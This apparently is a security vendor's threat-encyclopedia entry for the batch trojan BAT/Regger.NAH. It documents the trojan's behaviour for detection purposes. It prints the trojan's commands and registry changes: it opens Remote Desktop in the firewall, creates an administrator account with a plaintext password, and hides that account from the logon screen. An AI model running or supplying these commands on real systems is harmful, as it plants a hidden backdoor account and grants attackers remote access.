BAT/Regger [Threat Name] go to Threat

BAT/Regger.NAH [Threat Variant Name]

Category trojan
Detection created Jul 19, 2013
Detection database version 8585
Short description

The trojan has a simple payload.

Installation

The trojan does not create any copies of itself.


The trojan is probably a part of other malware.

Other information

The trojan executes the following commands:

  • netsh firewall set service type=remotedesktop mode=enable scope=all > nul
  • net user timalin /delete > nul
  • net user NTUSER /delete > nul
  • net user /add HelpAssistant jevoussalue > nul
  • net localgroup Administrators /add NTUSER > nul
  • net localgroup Administrateurs /add NTUSER > nul

The following Registry entries are created:

  • [HKEY_LOCAL_MACHINE\­SYSTEM\­CurrentControlSet\­Control\­Terminal Server]
    • "fDenyTSConnections" = 0
  • [HKEY_LOCAL_MACHINE\­Software\­Microsoft\­Windows NT\­CurrentVersion\­Winlogon\­SpecialAccounts\­Userlist]
    • "HelpAssistant" = 0

The trojan then removes itself from the computer.

Please enable Javascript to ensure correct displaying of this content and refresh this page.